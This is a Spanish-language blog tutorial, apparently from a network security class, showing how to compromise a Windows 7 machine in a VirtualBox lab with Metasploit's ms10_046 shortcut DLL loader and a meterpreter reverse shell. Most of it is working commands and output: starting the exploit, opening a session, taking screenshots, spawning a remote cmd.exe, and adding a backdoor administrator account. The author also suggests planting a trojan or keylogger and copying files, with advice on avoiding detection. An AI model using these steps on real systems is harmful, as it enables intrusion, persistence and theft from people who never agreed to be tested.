Amigos esta vez les quiero compartir una de las actividades practicas que he realizado con mis alumnos de Taller de Seguridad en Redes y se trata de como hackear un sistema operativo Windows 7 con Kali linux y metasploit en pocos pasos.
Utilizaremos la técnica de DLL Loader
Los requerimientos
- Kali Lnux 2.x y Rubi instalado
- PC con WIndows 7 Pro
- Metasploit Framework
Esta guía aplica a sistemas operativos sin antivirus/Firewall y con control de cuentas de usuario disminuidas o desactivadas
¿Qué es MetaSploit?
En pocas palabras Metasploit Project es un proyecto de seguridad informática que proporciona información acerca de las vulnerabilidades de seguridad y ayuda en las pruebas de penetración y desarrollo de firmas de IDS.
Preparándonos para el ataque, en mi caso utilizaré 2 máquinas cargadas en virtualbox previamente el pc con windows tiene la IP 192.168.56.101 y el con Kali linux la IP 192.168.56.102
1.- Iniciamos las máquinas y debemos conocer obviamente cada una de las direcciones IP
2.- En Kali Linux ingresamos a una terminal para iniciar metasploit y ejecutamos las siguientes lineas, en nuestro caso utilizaremos el exploit de meterpreter
root@kali:~# msfconsole
Metasploit Park, System Security Interface
Version 4.0.5, Alpha E
Ready...
msf > use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
msf exploit(ms10_046_shortcut_icon_dllloader) >
msf exploit(ms10_046_shortcut_icon_dllloader) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms10_046_shortcut_icon_dllloader) > show options
Ahora Aparecerán las opciones para configurar el servidor
3.- Asignaremos la IP del PC con Kali linux al SRVHOSTy LHOST
msf exploit(ms10_046_shortcut_icon_dllloader) > set SRVHOST 192.168.56.102
SRVHOST => 192.168.56.102
msf exploit(ms10_046_shortcut_icon_dllloader) > set LHOST 192.168.56.102
LHOST => 192.168.56.102
4.- Iniciamos el exploit
msf exploit(ms10_046_shortcut_icon_dllloader) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.56.102:4444
[*] Send vulnerable clients to \\192.168.56.102\TXSWXRTH\.
[*] Or, get clients to save and render the icon of http:///.lnk
[*] Using URL: http://192.168.56.102:80/
[*] Server started.
msf exploit(ms10_046_shortcut_icon_dllloader) >
Si nos fijamos hay una linea que dice "Using URL: http://192.168.56.102:80/" que es la que debemos utilizar en windows 7 desde el navegador
5- Una vez que accedamos a la dirección se nos abrirá una ventana preguntando si permitimos la conexión, damos clic en permitir.
Por su parte en la consola de metasploit comienza a emitir los logs del ataque
6.- al permitr se ejecutará el "dllloader" por lo que basta hacer un clic sobre el acceso directo
7.- En los log de msfconsole veremos que se habilita la sesión 1 y para ello hacemos un enter para despejar los logs y escribimos
msf exploit(ms10_046_shortcut_icon_dllloader) > sessions -i
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 GeekLinux-PC\GeekLinux @ GeekLinux-PC 192.168.56.102:4444 -> 192.168.56.101:49276 (192.168.56.101)
8.- Nos dice que esta la sesión 1 establecida por lo que el comando para seleccionar la sesión es similar al anterior solo que agregamos el número de la sesión al final.
msf exploit(ms10_046_shortcut_icon_dllloader) > sessions -i 1
9.- Aparecerá la consola de Meterpreter
msf exploit(ms10_046_shortcut_icon_dllloader) > sessions -i 1
[*] Starting interaction with 1...
meterpreter >
Existe mucha documentación acerca de los comandos de meterpreter, acá podríamos inyectar un trayano o un keylogger, crear o copiar archivos, agregar usuarios, etc.
Ejemplo de captura de pantalla del PC atacado
meterpreter > screenshot
En la carpeta Root nos aparece la captura de pantalla
Ejemplo acceder a cmd.exe remotamente
meterpreter > execute -f cmd.exe -i –H
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. Reservados todos los derechos.
C:\Windows\system32>
Ejemplo agregar un usuario
C:\Windows\system32> net user GeekLinux 123456 /add
Hemos creado a un usuario llamado GeekLinux y su clave de acceso es 123456
Ejemplo Agregar al usuario al grupo administradores
C:\Windows\system32> net localgroup Administradores GeekLinux /add
Existe una infinidad de cosas que hacer, por supuesto crear un usuario evidenciaría mucho que el equipo ha sido hackeado pero complementar con otros ataques de metasploit como inyectar un troyano o algún keylogger seria mejor, o simplemente realizar copias de los archivos que desea, etc.
Esta guía esta realizada solo con fines académicos, para utilizarla no olviden hacer referencia a mi blog, Saludos
No hay comentarios:
Publicar un comentario